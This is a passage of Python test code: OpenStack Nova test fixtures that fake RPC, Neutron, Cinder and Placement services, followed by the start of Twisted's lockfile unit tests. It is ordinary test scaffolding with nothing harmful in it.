        self.addCleanup(self.cleanup)
class DefaultFlavorsFixture(fixtures.Fixture):
    """Create the standard m1.* flavors used by many functional tests."""
    def setUp(self):
        super(DefaultFlavorsFixture, self).setUp()
        ctxt = context.get_admin_context()
        defaults = {'rxtx_factor': 1.0, 'disabled': False, 'is_public': True,
                    'ephemeral_gb': 0, 'swap': 0}
        extra_specs = {
            "hw:cpu_model": "SandyBridge",
            "hw:mem_page_size": "2048",
            "hw:cpu_policy": "dedicated"
        }
        # (memory_mb, vcpus, root_gb, flavorid, name, extra_specs)
        flavor_rows = [
            (512, 1, 1, '1', 'm1.tiny', None),
            (2048, 1, 20, '2', 'm1.small', None),
            (4096, 2, 40, '3', 'm1.medium', None),
            (8192, 4, 80, '4', 'm1.large', None),
            (16384, 8, 160, '5', 'm1.xlarge', None),
            (512, 1, 1, '6', 'm1.tiny.specs', extra_specs),
        ]
        for memory_mb, vcpus, root_gb, flavorid, name, specs in flavor_rows:
            kwargs = dict(defaults)
            if specs is not None:
                kwargs['extra_specs'] = specs
            objects.Flavor(context=ctxt, memory_mb=memory_mb, vcpus=vcpus,
                           root_gb=root_gb, flavorid=flavorid, name=name,
                           **kwargs).create()
class RPCFixture(fixtures.Fixture):
    """Set up a fake oslo.messaging transport for tests."""
    def __init__(self, *exmods):
        super(RPCFixture, self).__init__()
        # Extra exception modules allowed across the fake RPC boundary.
        self.exmods = list(exmods)
        self._buses = {}

    def _fake_create_transport(self, url):
        # FIXME(danms): Right now, collapse all connections
        # to a single bus. This is how our tests expect things
        # to work. When the tests are fixed, this fixture can
        # support simulating multiple independent buses, and this
        # hack should be removed.
        url = None
        # NOTE(danms): This will be called with a non-None url by
        # cells-aware code that is requesting to contact something on
        # one of the many transports we're multplexing here.
        bus = self._buses.get(url)
        if bus is None:
            bus = messaging.get_rpc_transport(
                CONF,
                url=url,
                allowed_remote_exmods=rpc.get_allowed_exmods())
            self._buses[url] = bus
        return bus

    def setUp(self):
        super(RPCFixture, self).setUp()
        self.addCleanup(rpc.cleanup)
        rpc.add_extra_exmods(*self.exmods)
        self.addCleanup(rpc.clear_extra_exmods)
        self.messaging_conf = messaging_conffixture.ConfFixture(CONF)
        self.messaging_conf.transport_driver = 'fake'
        self.useFixture(self.messaging_conf)
        self.useFixture(fixtures.MonkeyPatch(
            'nova.rpc.create_transport', self._fake_create_transport))
        # NOTE(danms): Execute the init with get_transport_url() as None,
        # instead of the parsed TransportURL(None) so that we can cache
        # it as it will be called later if the default is requested by
        # one of our mq-switching methods.
        with mock.patch('nova.rpc.get_transport_url') as mock_gtu:
            mock_gtu.return_value = None
            rpc.init(CONF)
class WarningsFixture(fixtures.Fixture):
    """Filters out warnings during test runs."""
    def setUp(self):
        super(WarningsFixture, self).setUp()
        # NOTE(sdague): Make deprecation warnings only happen once. Otherwise
        # this gets kind of crazy given the way that upstream python libs use
        # this.
        warnings.simplefilter("once", DeprecationWarning)
        warnings.filterwarnings('ignore',
                                message='With-statements now directly support'
                                        ' multiple context managers')
        # NOTE(sdague): nova does not use pkg_resources directly, this
        # is all very long standing deprecations about other tools
        # using it. None of this is useful to Nova development.
        warnings.filterwarnings('ignore',
            module='pkg_resources')
        # NOTE(sdague): this remains an unresolved item around the way
        # forward on is_admin, the deprecation is definitely really premature.
        warnings.filterwarnings('ignore',
            message='Policy enforcement is depending on the value of is_admin.'
                    ' This key is deprecated. Please update your policy '
                    'file to use the standard policy values.')
        # NOTE(sdague): mox3 is on life support, don't really care
        # about any deprecations coming from it
        warnings.filterwarnings('ignore',
            module='mox3.mox')
        # Restore the default warning filters when the test finishes.
        self.addCleanup(warnings.resetwarnings)
class ConfPatcher(fixtures.Fixture):
    """Fixture to patch and restore global CONF.

    Every override applied here is cleared again on teardown.
    """
    def __init__(self, **kwargs):
        """Constructor

        :params group: if specified all config options apply to that group.
        :params **kwargs: the rest of the kwargs are processed as a
            set of key/value pairs to be set as configuration override.
        """
        super(ConfPatcher, self).__init__()
        self.group = kwargs.pop('group', None)
        self.args = kwargs

    def setUp(self):
        super(ConfPatcher, self).setUp()
        for opt, value in self.args.items():
            # Register the restore before applying, so a failing
            # set_override still gets cleaned up.
            self.addCleanup(CONF.clear_override, opt, self.group)
            CONF.set_override(opt, value, self.group)
class OSAPIFixture(fixtures.Fixture):
    """Create an OS API server as a fixture.

    This spawns an OS API server as a fixture in a new greenthread in
    the current test. The fixture has a .api parameter with is a
    simple rest client that can communicate with it.

    This fixture is extremely useful for testing REST responses
    through the WSGI stack easily in functional tests.

    Usage:

        api = self.useFixture(fixtures.OSAPIFixture()).api
        resp = api.api_request('/someurl')
        self.assertEqual(200, resp.status_code)
        resp = api.api_request('/otherurl', method='POST', body='{foo}')

    The resp is a requests library response. Common attributes that
    you'll want to use are:

    - resp.status_code - integer HTTP status code returned by the request
    - resp.content - the body of the response
    - resp.headers - dictionary of HTTP headers returned
    """
    def __init__(self, api_version='v2',
                 project_id='6f70656e737461636b20342065766572'):
        """Constructor

        :param api_version: the API version that we're interested in
            using. Currently this expects 'v2' or 'v2.1' as possible
            options.
        :param project_id: the project id to use on the API.
        """
        super(OSAPIFixture, self).__init__()
        self.api_version = api_version
        self.project_id = project_id
    def setUp(self):
        super(OSAPIFixture, self).setUp()
        # in order to run these in tests we need to bind only to local
        # host, and dynamically allocate ports
        conf_overrides = {
            'osapi_compute_listen': '127.0.0.1',
            'osapi_compute_listen_port': 0,
            'debug': True,
        }
        self.useFixture(ConfPatcher(**conf_overrides))
        self.osapi = service.WSGIService("osapi_compute")
        self.osapi.start()
        self.addCleanup(self.osapi.stop)
        # Build the base URL from the actually-bound host/port.
        self.auth_url = 'http://%(host)s:%(port)s/%(api_version)s' % ({
            'host': self.osapi.host, 'port': self.osapi.port,
            'api_version': self.api_version})
        # Plain and admin-credentialed REST clients for the tests.
        self.api = client.TestOpenStackClient('fake', 'fake', self.auth_url,
                                              self.project_id)
        self.admin_api = client.TestOpenStackClient(
            'admin', 'admin', self.auth_url, self.project_id)
class OSMetadataServer(fixtures.Fixture):
    """Create an OS Metadata API server as a fixture.

    This spawns an OS Metadata API server as a fixture in a new
    greenthread in the current test.

    TODO(sdague): ideally for testing we'd have something like the
    test client which acts like requests, but connects any of the
    interactions needed.
    """
    def setUp(self):
        super(OSMetadataServer, self).setUp()
        # Bind to localhost only and let the OS pick a free port so
        # parallel test runs don't collide.
        overrides = {
            'metadata_listen': '127.0.0.1',
            'metadata_listen_port': 0,
            'debug': True
        }
        self.useFixture(ConfPatcher(**overrides))
        # NOTE(mikal): we don't have root to manipulate iptables, so just
        # zero that bit out.
        self.useFixture(fixtures.MonkeyPatch(
            'nova.network.linux_net.IptablesManager._apply',
            lambda _: None))
        self.metadata = service.WSGIService("metadata")
        self.metadata.start()
        self.addCleanup(self.metadata.stop)
        self.md_url = "http://%s:%s/" % (
            overrides['metadata_listen'],
            self.metadata.port)
class PoisonFunctions(fixtures.Fixture):
    """Poison functions so they explode if we touch them.

    When running under a non full stack test harness there are parts
    of the code that you don't want to go anywhere near. These include
    things like code that spins up extra threads, which just
    introduces races.
    """
    def setUp(self):
        super(PoisonFunctions, self).setUp()
        # The nova libvirt driver starts an event thread which only
        # causes trouble in tests. Make sure that if tests don't
        # properly patch it the test explodes.
        # explicit import because MonkeyPatch doesn't magic import
        # correctly if we are patching a method on a class in a
        # module.
        import nova.virt.libvirt.host  # noqa
        def evloop(*args, **kwargs):
            # Abort the whole process: an un-stubbed event thread would
            # otherwise silently race with the test.
            import sys
            warnings.warn("Forgot to disable libvirt event thread")
            sys.exit(1)
        self.useFixture(fixtures.MonkeyPatch(
            'nova.virt.libvirt.host.Host._init_events',
            evloop))
class IndirectionAPIFixture(fixtures.Fixture):
    """Patch and restore the global NovaObject indirection api."""
    def __init__(self, indirection_api):
        """Constructor

        :param indirection_api: the indirection API to be used for tests.
        """
        super(IndirectionAPIFixture, self).__init__()
        self.indirection_api = indirection_api

    def setUp(self):
        super(IndirectionAPIFixture, self).setUp()
        # Remember the original so cleanup can restore it.
        self.orig_indirection_api = obj_base.NovaObject.indirection_api
        obj_base.NovaObject.indirection_api = self.indirection_api
        self.addCleanup(self.cleanup)

    def cleanup(self):
        obj_base.NovaObject.indirection_api = self.orig_indirection_api
class _FakeGreenThread(object):
def __init__(self, func, *args, **kwargs):
self._result = func(*args, **kwargs)
def cancel(self, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def kill(self, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def link(self, func, *args, **kwargs):
func(self, *args, **kwargs)
def unlink(self, func, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def wait(self):
return self._result
class SpawnIsSynchronousFixture(fixtures.Fixture):
    """Patch and restore the spawn_n utility method to be synchronous"""
    def setUp(self):
        super(SpawnIsSynchronousFixture, self).setUp()
        # Both spawn variants run the target inline via _FakeGreenThread.
        for target in ('nova.utils.spawn_n', 'nova.utils.spawn'):
            self.useFixture(
                fixtures.MonkeyPatch(target, _FakeGreenThread))
class BannedDBSchemaOperations(fixtures.Fixture):
    """Ban some operations for migrations"""
    def __init__(self, banned_resources=None):
        super(BannedDBSchemaOperations, self).__init__()
        self._banned_resources = banned_resources or []

    @staticmethod
    def _explode(resource, op):
        raise exception.DBNotAllowed(
            'Operation %s.%s() is not allowed in a database migration' % (
                resource, op))

    def _make_banned(self, resource, op):
        # Factory so each patch captures its own resource name. A plain
        # lambda inside the setUp loop would late-bind 'thing' and every
        # patched operation would report the last resource in the list.
        return lambda *a, **k: self._explode(resource, op)

    def setUp(self):
        super(BannedDBSchemaOperations, self).setUp()
        for thing in self._banned_resources:
            self.useFixture(fixtures.MonkeyPatch(
                'sqlalchemy.%s.drop' % thing,
                self._make_banned(thing, 'drop')))
            self.useFixture(fixtures.MonkeyPatch(
                'sqlalchemy.%s.alter' % thing,
                self._make_banned(thing, 'alter')))
class ForbidNewLegacyNotificationFixture(fixtures.Fixture):
    """Make sure the test fails if new legacy notification is added"""
    def __init__(self):
        super(ForbidNewLegacyNotificationFixture, self).__init__()
        self.notifier = rpc.LegacyValidatingNotifier

    def setUp(self):
        super(ForbidNewLegacyNotificationFixture, self).setUp()
        self.notifier.fatal = True
        # Whitelist the special event type used by
        # nova.tests.unit.test_notifications.NotificationsTestCase
        self.notifier.allowed_legacy_notification_event_types.append(
            '_decorated_function')
        self.addCleanup(self.cleanup)

    def cleanup(self):
        # Undo both the fatal flag and the whitelist entry.
        self.notifier.fatal = False
        self.notifier.allowed_legacy_notification_event_types.remove(
            '_decorated_function')
class AllServicesCurrent(fixtures.Fixture):
    """Report service_obj.SERVICE_VERSION as the minimum version of every
    service, and reset the cached compute RPC version cap."""
    def setUp(self):
        super(AllServicesCurrent, self).setUp()
        self.useFixture(fixtures.MonkeyPatch(
            'nova.objects.Service.get_minimum_version_multi',
            self._fake_minimum))
        # Clear the cached version cap so it is recomputed against the
        # patched minimum above.
        compute_rpcapi.LAST_VERSION = None
    def _fake_minimum(self, *args, **kwargs):
        # Any arguments are ignored; every lookup gets the current version.
        return service_obj.SERVICE_VERSION
class RegisterNetworkQuota(fixtures.Fixture):
    """Register the 'networks' quota resource for the span of one test.

    Quota resource registration modifies the global QUOTAS engine, so this
    fixture registers network quota on setUp and unregisters it on cleanup.
    """

    def setUp(self):
        super(RegisterNetworkQuota, self).setUp()
        tenant_networks._register_network_quota()
        self.addCleanup(self.cleanup)

    def cleanup(self):
        # pop() with a default tolerates the resource already being gone.
        nova_quota.QUOTAS._resources.pop('networks', None)
class NeutronFixture(fixtures.Fixture):
    """A fixture to boot instances with neutron ports"""
    # the default project_id in OsaAPIFixtures
    tenant_id = '6f70656e737461636b20342065766572'
    # Canned REST-shaped payloads describing one private network with a
    # single subnet; the mocked neutron client built in setUp() answers
    # from these class-level dicts.
    network_1 = {
        'status': 'ACTIVE',
        'subnets': [],
        'name': 'private-network',
        'admin_state_up': True,
        'tenant_id': tenant_id,
        'id': '3cb9bc59-5699-4588-a4b1-b87f96708bc6',
    }
    subnet_1 = {
        'name': 'private-subnet',
        'enable_dhcp': True,
        'network_id': network_1['id'],
        'tenant_id': tenant_id,
        'dns_nameservers': [],
        'allocation_pools': [
            {
                'start': '192.168.1.1',
                'end': '192.168.1.254'
            }
        ],
        'host_routes': [],
        'ip_version': 4,
        'gateway_ip': '192.168.1.1',
        'cidr': '192.168.1.1/24',
        'id': 'f8a6e8f8-c2ec-497c-9f23-da9616de54ef'
    }
    # Wire the subnet into the network after both dicts exist.
    network_1['subnets'] = [subnet_1['id']]
    port_1 = {
        'id': 'ce531f90-199f-48c0-816c-13e38010b442',
        'network_id': network_1['id'],
        'admin_state_up': True,
        'status': 'ACTIVE',
        'mac_address': 'fa:16:3e:4c:2c:30',
        'fixed_ips': [
            {
                # The IP on this port must be a prefix of the IP on port_2 to
                # test listing servers with an ip filter regex.
                'ip_address': '192.168.1.3',
                'subnet_id': subnet_1['id']
            }
        ],
        'tenant_id': tenant_id
    }
    # This port is only used if the fixture is created with multiple_ports=True
    port_2 = {
        'id': '88dae9fa-0dc6-49e3-8c29-3abc41e99ac9',
        'network_id': network_1['id'],
        'admin_state_up': True,
        'status': 'ACTIVE',
        'mac_address': '00:0c:29:0d:11:74',
        'fixed_ips': [
            {
                'ip_address': '192.168.1.30',
                'subnet_id': subnet_1['id']
            }
        ],
        'tenant_id': tenant_id
    }
    # Pre-hydratable network_info blob returned by the stubbed
    # add/remove_fixed_ip_to/from_instance calls in setUp().
    nw_info = [{
        "profile": {},
        "ovs_interfaceid": "b71f1699-42be-4515-930a-f3ef01f94aa7",
        "preserve_on_delete": False,
        "network": {
            "bridge": "br-int",
            "subnets": [{
                "ips": [{
                    "meta": {},
                    "version": 4,
                    "type": "fixed",
                    "floating_ips": [],
                    "address": "10.0.0.4"
                }],
                "version": 4,
                "meta": {},
                "dns": [],
                "routes": [],
                "cidr": "10.0.0.0/26",
                "gateway": {
                    "meta": {},
                    "version": 4,
                    "type": "gateway",
                    "address": "10.0.0.1"
                }
            }],
            "meta": {
                "injected": False,
                "tenant_id": tenant_id,
                "mtu": 1500
            },
            "id": "e1882e38-38c2-4239-ade7-35d644cb963a",
            "label": "public"
        },
        "devname": "tapb71f1699-42",
        "vnic_type": "normal",
        "qbh_params": None,
        "meta": {},
        "details": {
            "port_filter": True,
            "ovs_hybrid_plug": True
        },
        "address": "fa:16:3e:47:94:4a",
        "active": True,
        "type": "ovs",
        "id": "b71f1699-42be-4515-930a-f3ef01f94aa7",
        "qbg_params": None
    }]
    def __init__(self, test, multiple_ports=False):
        """:param test: the test case providing the stub_out() helper
        :param multiple_ports: if True, list_ports also returns port_2
        """
        super(NeutronFixture, self).__init__()
        self.test = test
        self.multiple_ports = multiple_ports
    def setUp(self):
        super(NeutronFixture, self).setUp()
        # Neutralize the neutronv2 API entry points that would otherwise
        # talk to a real neutron service.
        self.test.stub_out(
            'nova.network.neutronv2.api.API.'
            'validate_networks',
            lambda *args, **kwargs: 1)
        self.test.stub_out(
            'nova.network.neutronv2.api.API.'
            'create_pci_requests_for_sriov_ports',
            lambda *args, **kwargs: None)
        self.test.stub_out(
            'nova.network.neutronv2.api.API.setup_networks_on_host',
            lambda *args, **kwargs: None)
        self.test.stub_out(
            'nova.network.neutronv2.api.API.migrate_instance_start',
            lambda *args, **kwargs: None)
        self.test.stub_out(
            'nova.network.neutronv2.api.API.add_fixed_ip_to_instance',
            lambda *args, **kwargs: network_model.NetworkInfo.hydrate(
                NeutronFixture.nw_info))
        self.test.stub_out(
            'nova.network.neutronv2.api.API.remove_fixed_ip_from_instance',
            lambda *args, **kwargs: network_model.NetworkInfo.hydrate(
                NeutronFixture.nw_info))
        self.test.stub_out(
            'nova.network.neutronv2.api.API.migrate_instance_finish',
            lambda *args, **kwargs: None)
        self.test.stub_out(
            'nova.network.security_group.neutron_driver.SecurityGroupAPI.'
            'get_instances_security_groups_bindings',
            lambda *args, **kwargs: {})
        # Fake neutron client that answers from the canned class-level data.
        mock_neutron_client = mock.Mock()
        mock_neutron_client.list_extensions.return_value = {'extensions': []}
        def stub_show_port(port_id, *args, **kwargs):
            # Only the two canned ports "exist".
            if port_id == NeutronFixture.port_1['id']:
                return {'port': NeutronFixture.port_1}
            if port_id == NeutronFixture.port_2['id']:
                return {'port': NeutronFixture.port_2}
            raise exception.PortNotFound(port_id=port_id)
        mock_neutron_client.show_port.side_effect = stub_show_port
        mock_neutron_client.list_networks.return_value = {
            'networks': [NeutronFixture.network_1]}
        def stub_list_ports(*args, **kwargs):
            # port_2 only shows up when the fixture was built with
            # multiple_ports=True.
            ports = {'ports': [NeutronFixture.port_1]}
            if self.multiple_ports:
                ports['ports'].append(NeutronFixture.port_2)
            return ports
        mock_neutron_client.list_ports.side_effect = stub_list_ports
        mock_neutron_client.list_subnets.return_value = {
            'subnets': [NeutronFixture.subnet_1]}
        mock_neutron_client.list_floatingips.return_value = {'floatingips': []}
        # NOTE(review): update_port reuses stub_show_port, so updates are
        # silently ignored and the unchanged canned port is returned --
        # confirm that is intended by the tests using this fixture.
        mock_neutron_client.update_port.side_effect = stub_show_port
        self.test.stub_out(
            'nova.network.neutronv2.api.get_client',
            lambda *args, **kwargs: mock_neutron_client)
class _NoopConductor(object):
def __getattr__(self, key):
def _noop_rpc(*args, **kwargs):
return None
return _noop_rpc
class NoopConductorFixture(fixtures.Fixture):
    """Stub out the conductor API to do nothing"""

    def setUp(self):
        super(NoopConductorFixture, self).setUp()
        # Both conductor entry points get the same do-nothing stand-in.
        for target in ('nova.conductor.ComputeTaskAPI', 'nova.conductor.API'):
            self.useFixture(fixtures.MonkeyPatch(target, _NoopConductor))
class EventReporterStub(fixtures.Fixture):
    """Replace nova.compute.utils.EventReporter with a MagicMock factory."""

    def setUp(self):
        super(EventReporterStub, self).setUp()

        def _fake_event_reporter(*args, **kwargs):
            # Each use gets a fresh MagicMock, same as the original lambda.
            return mock.MagicMock()

        self.useFixture(fixtures.MonkeyPatch(
            'nova.compute.utils.EventReporter', _fake_event_reporter))
class CinderFixture(fixtures.Fixture):
    """A fixture to volume operations"""
    # the default project_id in OSAPIFixtures
    tenant_id = '6f70656e737461636b20342065766572'
    # Well-known volume IDs recognized by fake_get below: the SWAP_* pair
    # drives the happy-path swap-volume tests, the SWAP_ERR_* pair drives
    # the failure/rollback path.
    SWAP_OLD_VOL = 'a07f71dc-8151-4e7d-a0cc-cd24a3f11113'
    SWAP_NEW_VOL = '227cc671-f30b-4488-96fd-7d0bf13648d8'
    SWAP_ERR_OLD_VOL = '828419fa-3efb-4533-b458-4267ca5fe9b1'
    SWAP_ERR_NEW_VOL = '9c6d9c2d-7a8f-4c80-938d-3bf062b8d489'
    def __init__(self, test):
        """:param test: the test case providing the stub_out() helper"""
        super(CinderFixture, self).__init__()
        self.test = test
        # Flipped to True by fake_unreserve_volume once the failed-swap
        # rollback path has been reached; tests can poll this flag.
        self.swap_error = False
        self.swap_volume_instance_uuid = None
        self.swap_volume_instance_error_uuid = None
        # This is a map of instance UUIDs mapped to a list of volume IDs.
        # This map gets updated on attach/detach operations.
        self.attachments = collections.defaultdict(list)
    def setUp(self):
        super(CinderFixture, self).setUp()
        def fake_get(self_api, context, volume_id):
            # Check for the special swap volumes.
            if volume_id in (CinderFixture.SWAP_OLD_VOL,
                             CinderFixture.SWAP_ERR_OLD_VOL):
                volume = {
                    'status': 'available',
                    'display_name': 'TEST1',
                    'attach_status': 'detached',
                    'id': volume_id,
                    'size': 1
                }
                # If a test registered an instance for this swap volume,
                # report the volume as attached to that instance.
                if ((self.swap_volume_instance_uuid and
                     volume_id == CinderFixture.SWAP_OLD_VOL) or
                    (self.swap_volume_instance_error_uuid and
                     volume_id == CinderFixture.SWAP_ERR_OLD_VOL)):
                    instance_uuid = (self.swap_volume_instance_uuid
                                     if volume_id == CinderFixture.SWAP_OLD_VOL
                                     else self.swap_volume_instance_error_uuid)
                    volume.update({
                        'status': 'in-use',
                        'attachments': {
                            instance_uuid: {
                                'mountpoint': '/dev/vdb',
                                'attachment_id': volume_id
                            }
                        },
                        'attach_status': 'attached'
                    })
                return volume
            # Check to see if the volume is attached.
            for instance_uuid, volumes in self.attachments.items():
                if volume_id in volumes:
                    # The volume is attached.
                    volume = {
                        'status': 'in-use',
                        'display_name': volume_id,
                        'attach_status': 'attached',
                        'id': volume_id,
                        'size': 1,
                        'attachments': {
                            instance_uuid: {
                                'attachment_id': volume_id,
                                'mountpoint': '/dev/vdb'
                            }
                        }
                    }
                    break
            else:
                # This is a test that does not care about the actual details.
                volume = {
                    'status': 'available',
                    'display_name': 'TEST2',
                    'attach_status': 'detached',
                    'id': volume_id,
                    'size': 1
                }
                # update the status based on existing attachments
                has_attachment = any(
                    [volume['id'] in attachments
                     for attachments in self.attachments.values()])
                # NOTE(review): 'attached'/'detached' look like attach_status
                # values rather than volume statuses ('in-use'/'available');
                # confirm no test depends on these exact strings.
                volume['status'] = 'attached' if has_attachment else 'detached'
            return volume
        def fake_initialize_connection(self, context, volume_id, connector):
            if volume_id == CinderFixture.SWAP_ERR_NEW_VOL:
                # Return a tuple in order to raise an exception.
                return ()
            return {}
        def fake_migrate_volume_completion(self, context, old_volume_id,
                                           new_volume_id, error):
            return {'save_volume_id': new_volume_id}
        def fake_unreserve_volume(self_api, context, volume_id):
            # Signaling that swap_volume has encountered the error
            # from initialize_connection and is working on rolling back
            # the reservation on SWAP_ERR_NEW_VOL.
            self.swap_error = True
        def fake_attach(_self, context, volume_id, instance_uuid,
                        mountpoint, mode='rw'):
            # Check to see if the volume is already attached to any server.
            for instance, volumes in self.attachments.items():
                if volume_id in volumes:
                    raise exception.InvalidInput(
                        reason='Volume %s is already attached to '
                               'instance %s' % (volume_id, instance))
            # It's not attached so let's "attach" it.
            self.attachments[instance_uuid].append(volume_id)
        self.test.stub_out('nova.volume.cinder.API.attach',
                           fake_attach)
        def fake_detach(_self, context, volume_id, instance_uuid=None,
                        attachment_id=None):
            if instance_uuid is not None:
                # If the volume isn't attached to this instance it will
                # result in a ValueError which indicates a broken test or
                # code, so we just let that raise up.
                self.attachments[instance_uuid].remove(volume_id)
            else:
                # No instance given: detach from whichever instance holds it.
                for instance, volumes in self.attachments.items():
                    if volume_id in volumes:
                        volumes.remove(volume_id)
                        break
        self.test.stub_out('nova.volume.cinder.API.detach', fake_detach)
        # Wire the remaining cinder API entry points to the fakes above,
        # or to no-ops where tests only need the call to succeed.
        self.test.stub_out('nova.volume.cinder.API.begin_detaching',
                           lambda *args, **kwargs: None)
        self.test.stub_out('nova.volume.cinder.API.get',
                           fake_get)
        self.test.stub_out('nova.volume.cinder.API.initialize_connection',
                           fake_initialize_connection)
        self.test.stub_out(
            'nova.volume.cinder.API.migrate_volume_completion',
            fake_migrate_volume_completion)
        self.test.stub_out('nova.volume.cinder.API.reserve_volume',
                           lambda *args, **kwargs: None)
        self.test.stub_out('nova.volume.cinder.API.roll_detaching',
                           lambda *args, **kwargs: None)
        self.test.stub_out('nova.volume.cinder.API.terminate_connection',
                           lambda *args, **kwargs: None)
        self.test.stub_out('nova.volume.cinder.API.unreserve_volume',
                           fake_unreserve_volume)
class PlacementFixture(fixtures.Fixture):
    """A fixture to placement operations.

    Runs a local WSGI server bound on a free port and having the Placement
    application with NoAuth middleware.
    This fixture also prevents calling the ServiceCatalog for getting the
    endpoint.

    It's possible to ask for a specific token when running the fixtures so
    all calls would be passing this token.
    """
    def __init__(self, token='admin'):
        # Call the base __init__ like the other fixtures in this module do;
        # it was previously skipped.
        super(PlacementFixture, self).__init__()
        self.token = token
    def setUp(self):
        super(PlacementFixture, self).setUp()
        self.useFixture(ConfPatcher(group='api', auth_strategy='noauth2'))
        loader = placement_deploy.loadapp(CONF)
        # wsgi-intercept expects a zero-argument callable returning the app.
        def app():
            return loader
        host = uuidsentinel.placement_host
        self.endpoint = 'http://%s/placement' % host
        intercept = interceptor.RequestsInterceptor(app, url=self.endpoint)
        intercept.install_intercept()
        self.addCleanup(intercept.uninstall_intercept)
        # Turn off manipulation of socket_options in TCPKeepAliveAdapter
        # to keep wsgi-intercept happy. Replace it with the method
        # from its superclass.
        self.useFixture(fixtures.MonkeyPatch(
            'keystoneauth1.session.TCPKeepAliveAdapter.init_poolmanager',
            adapters.HTTPAdapter.init_poolmanager))
        self._client = ks.Session(auth=None)
        # NOTE(sbauza): We need to mock the scheduler report client because
        # we need to fake Keystone by directly calling the endpoint instead
        # of looking up the service catalog, like we did for the OSAPIFixture.
        self.useFixture(fixtures.MonkeyPatch(
            'nova.scheduler.client.report.SchedulerReportClient.get',
            self._fake_get))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.scheduler.client.report.SchedulerReportClient.post',
            self._fake_post))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.scheduler.client.report.SchedulerReportClient.put',
            self._fake_put))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.scheduler.client.report.SchedulerReportClient.delete',
            self._fake_delete))
    @staticmethod
    def _update_headers_with_version(headers, **kwargs):
        version = kwargs.get("version")
        if version is not None:
            # TODO(mriedem): Perform some version discovery at some point.
            headers.update({
                'OpenStack-API-Version': 'placement %s' % version
            })
    def _headers(self, **kwargs):
        """Build the request headers shared by all the fake verbs below.

        TODO(sbauza): The current placement NoAuthMiddleware returns a 401
        in case a token is not provided. We should change that by creating
        a fake token so we could remove adding the header below.
        """
        headers = {'x-auth-token': self.token}
        self._update_headers_with_version(headers, **kwargs)
        return headers
    def _fake_get(self, *args, **kwargs):
        (url,) = args[1:]
        return self._client.get(
            url,
            endpoint_override=self.endpoint,
            headers=self._headers(**kwargs),
            raise_exc=False)
    def _fake_post(self, *args, **kwargs):
        (url, data) = args[1:]
        # NOTE(sdague): using json= instead of data= sets the
        # media type to application/json for us. Placement API is
        # more sensitive to this than other APIs in the OpenStack
        # ecosystem.
        return self._client.post(
            url, json=data,
            endpoint_override=self.endpoint,
            headers=self._headers(**kwargs),
            raise_exc=False)
    def _fake_put(self, *args, **kwargs):
        (url, data) = args[1:]
        # NOTE(sdague): see _fake_post about why json= matters here.
        return self._client.put(
            url, json=data,
            endpoint_override=self.endpoint,
            headers=self._headers(**kwargs),
            raise_exc=False)
    def _fake_delete(self, *args):
        (url,) = args[1:]
        # No version kwargs are accepted here, matching the real delete.
        return self._client.delete(
            url,
            endpoint_override=self.endpoint,
            headers=self._headers(),
            raise_exc=False)
| |
# Copyright (c) 2005 Divmod, Inc.
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.python.lockfile}.
"""
import os, errno
from twisted.trial import unittest
from twisted.python import lockfile
from twisted.python.reflect import requireModule
from twisted.python.runtime import platform
# Skip reason for the kill-related tests below; None means they run.
skipKill = None
if platform.isWindows():
    # On Windows lockfile.kill is only implemented when the pywin32
    # bindings can be imported.
    if(requireModule('win32api.OpenProcess') is None and
        requireModule('pywintypes') is None
            ):
        skipKill = ("On windows, lockfile.kill is not implemented in the "
                    "absence of win32api and/or pywintypes.")
class UtilTests(unittest.TestCase):
    """
    Tests for the helper functions used to implement L{FilesystemLock}.
    """
    def test_symlinkEEXIST(self):
        """
        L{lockfile.symlink} raises L{OSError} with C{errno} set to L{EEXIST}
        when an attempt is made to create a symlink which already exists.
        """
        name = self.mktemp()
        lockfile.symlink('foo', name)
        exc = self.assertRaises(OSError, lockfile.symlink, 'foo', name)
        self.assertEqual(exc.errno, errno.EEXIST)
    def test_symlinkEIOWindows(self):
        """
        L{lockfile.symlink} raises L{OSError} with C{errno} set to L{EIO} when
        the underlying L{rename} call fails with L{EIO}.
        Renaming a file on Windows may fail if the target of the rename is in
        the process of being deleted (directory deletion appears not to be
        atomic).
        """
        name = self.mktemp()
        def fakeRename(src, dst):
            raise IOError(errno.EIO, None)
        self.patch(lockfile, 'rename', fakeRename)
        exc = self.assertRaises(IOError, lockfile.symlink, name, "foo")
        self.assertEqual(exc.errno, errno.EIO)
    # Trial honors a 'skip' attribute on test methods: this case only makes
    # sense on Windows.
    if not platform.isWindows():
        test_symlinkEIOWindows.skip = (
            "special rename EIO handling only necessary and correct on "
            "Windows.")
    def test_readlinkENOENT(self):
        """
        L{lockfile.readlink} raises L{OSError} with C{errno} set to L{ENOENT}
        when an attempt is made to read a symlink which does not exist.
        """
        name = self.mktemp()
        exc = self.assertRaises(OSError, lockfile.readlink, name)
        self.assertEqual(exc.errno, errno.ENOENT)
    def test_readlinkEACCESWindows(self):
        """
        L{lockfile.readlink} raises L{OSError} with C{errno} set to L{EACCES}
        on Windows when the underlying file open attempt fails with C{EACCES}.
        Opening a file on Windows may fail if the path is inside a directory
        which is in the process of being deleted (directory deletion appears
        not to be atomic).
        """
        name = self.mktemp()
        def fakeOpen(path, mode):
            raise IOError(errno.EACCES, None)
        self.patch(lockfile, '_open', fakeOpen)
        exc = self.assertRaises(IOError, lockfile.readlink, name)
        self.assertEqual(exc.errno, errno.EACCES)
    if not platform.isWindows():
        test_readlinkEACCESWindows.skip = (
            "special readlink EACCES handling only necessary and correct on "
            "Windows.")
    def test_kill(self):
        """
        L{lockfile.kill} returns without error if passed the PID of a
        process which exists and signal C{0}.
        """
        lockfile.kill(os.getpid(), 0)
    # skipKill is computed at module level from pywin32 availability.
    test_kill.skip = skipKill
    def test_killESRCH(self):
        """
        L{lockfile.kill} raises L{OSError} with errno of L{ESRCH} if
        passed a PID which does not correspond to any process.
        """
        # Hopefully there is no process with PID 2 ** 31 - 1
        exc = self.assertRaises(OSError, lockfile.kill, 2 ** 31 - 1, 0)
        self.assertEqual(exc.errno, errno.ESRCH)
    test_killESRCH.skip = skipKill
    def test_noKillCall(self):
